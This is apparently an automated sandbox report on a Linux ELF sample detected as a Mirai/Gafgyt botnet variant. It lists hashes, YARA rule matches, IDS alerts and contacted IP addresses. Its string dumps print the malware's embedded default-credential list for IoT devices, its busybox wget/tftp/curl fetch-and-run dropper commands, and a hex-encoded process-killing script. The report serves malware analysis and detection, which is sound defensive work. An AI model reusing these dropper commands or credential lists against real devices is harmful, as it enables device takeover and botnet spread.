Edit tour

Linux Analysis Report
i686.elf

Overview

General Information

Sample name:i686.elf
Analysis ID:1584245
MD5:20f4bca1aa1a3bcdf7d2b60cea290831
SHA1:379f98b65a29576975c8c55b91badc0d940e630b
SHA256:95b557c53a7d8165212c78caf9c2cfc8dfb56b796dbdcade66655b41b5f766e1
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Deletes system log files
Machine Learning detection for sample
Performs DNS TXT record lookups
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584245
Start date and time:2025-01-04 23:57:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 4s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i686.elf
Detection:MAL
Classification:mal92.troj.evad.linELF@0/1@28/0
  • VT rate limit hit for: i686.elf
Command:/tmp/i686.elf
PID:6252
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB aNd fOxNoIntel lEarNs sHiT
Standard Error:
  • system is lnxubuntu20
  • i686.elf (PID: 6252, Parent: 6175, MD5: 20f4bca1aa1a3bcdf7d2b60cea290831) Arguments: /tmp/i686.elf
    • i686.elf New Fork (PID: 6253, Parent: 6252)
    • i686.elf New Fork (PID: 6254, Parent: 6252)
    • i686.elf New Fork (PID: 6268, Parent: 6252)
    • i686.elf New Fork (PID: 6289, Parent: 6252)
    • i686.elf New Fork (PID: 6314, Parent: 6252)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
i686.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    i686.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
    • 0xe168:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
    i686.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
    • 0xe957:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
    i686.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
    • 0xa66a:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    • 0xa7cc:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    i686.elfLinux_Trojan_Gafgyt_d996d335unknownunknown
    • 0x1138a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
    Click to see the 3 entries
    SourceRuleDescriptionAuthorStrings
    6252.1.0000000000400000.0000000000416000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6252.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xe168:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      6252.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0xe957:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      6252.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0xa66a:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0xa7cc:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      6252.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_d996d335unknownunknown
      • 0x1138a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
      Click to see the 11 entries
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-05T00:00:00.819729+010020135141A Network Trojan was detected192.168.2.2343689195.10.195.19553UDP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: i686.elfReversingLabs: Detection: 26%
      Source: i686.elfJoe Sandbox ML: detected
      Source: i686.elfString: /bin/busybox echo -ne >> > upnpPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafed20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenablelinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4[

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2013514 - Severity 1 - ET MALWARE Potential DNS Command and Control via TXT queries : 192.168.2.23:43689 -> 195.10.195.195:53
      Source: global trafficTCP traffic: 38.60.221.89 ports 18234,45123,0,1,62849,2,3,31428,10321
      Source: global trafficTCP traffic: 156.244.6.20 ports 45123,1,2,3,8,9,19823,5429
      Source: global trafficTCP traffic: 188.166.182.194 ports 49657,64715,3,5,7,8,31428,5837
      Source: global trafficTCP traffic: 192.168.2.23:46228 -> 38.60.221.89:10321
      Source: global trafficTCP traffic: 192.168.2.23:54650 -> 188.166.182.194:5837
      Source: global trafficTCP traffic: 192.168.2.23:37076 -> 156.244.6.20:19823
      Source: global trafficUDP traffic: 192.168.2.23:42241 -> 74.125.250.129:19302
      Source: /tmp/i686.elf (PID: 6252)Socket: 127.0.0.1:43478Jump to behavior
      Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
      Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
      Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 131.24.86.106
      Source: unknownTCP traffic detected without corresponding DNS query: 131.24.86.106
      Source: unknownTCP traffic detected without corresponding DNS query: 53.205.207.166
      Source: unknownTCP traffic detected without corresponding DNS query: 53.205.207.166
      Source: unknownTCP traffic detected without corresponding DNS query: 106.19.70.44
      Source: unknownTCP traffic detected without corresponding DNS query: 106.19.70.44
      Source: unknownTCP traffic detected without corresponding DNS query: 131.24.86.106
      Source: unknownTCP traffic detected without corresponding DNS query: 106.19.70.44
      Source: unknownTCP traffic detected without corresponding DNS query: 53.205.207.166
      Source: unknownTCP traffic detected without corresponding DNS query: 106.19.70.44
      Source: unknownTCP traffic detected without corresponding DNS query: 131.24.86.106
      Source: unknownTCP traffic detected without corresponding DNS query: 53.205.207.166
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: unknownTCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: global trafficDNS traffic detected: DNS query: ai.stackoverflow.libre
      Source: i686.elfString found in binary or memory: http:///curl.sh
      Source: i686.elfString found in binary or memory: http:///wget.sh
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      barindex
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 Author: unknown
      Source: Initial sampleString containing 'busybox' found: usage: busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
      Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
      Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
      Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echo
      Source: Initial sampleString containing 'busybox' found: 191.235.89.0191.234.196.0191.235.53.0134.0.0.035.195.135.035.195.136.035.195.137.035.195.138.035.195.14.035.195.140.035.195.142.035.195.144.035.195.145.035.195.147.035.195.148.035.195.149.035.195.15.035.195.152.035.195.153.035.195.154.035.195.157.035.195.158.035.195.160.035.195.161.035.195.162.035.195.163.035.195.164.035.195.165.035.195.166.035.195.169.035.195.170.035.195.171.035.195.172.035.195.173.035.195.174.035.195.175.035.195.179.035.195.18.035.195.180.035.195.181.035.195.182.035.195.183.035.195.185.035.195.187.035.195.188.035.195.189.035.195.19.035.195.190.035.195.192.035.195.195.035.195.198.035.195.199.035.195.202.035.195.203.035.195.204.035.195.207.035.195.208.035.195.210.035.195.212.035.195.213.035.195.214.035.195.217.035.195.219.035.195.22.035.195.220.035.195.221.035.195.222.035.195.223.035.195.227.035.195.228.035.195.229.035.195.23.035.195.237.035.195.241.035.195.242.035.195.244.035.195.245.035.195.249.035.195.251.035.195.253.035.195.254.035.195.26.035.195.28.035.195.29.035.195.3.035.195.31.035.195
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnpPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafed20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenablelinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/bus
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: /tmp/i686.elf (PID: 6253)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
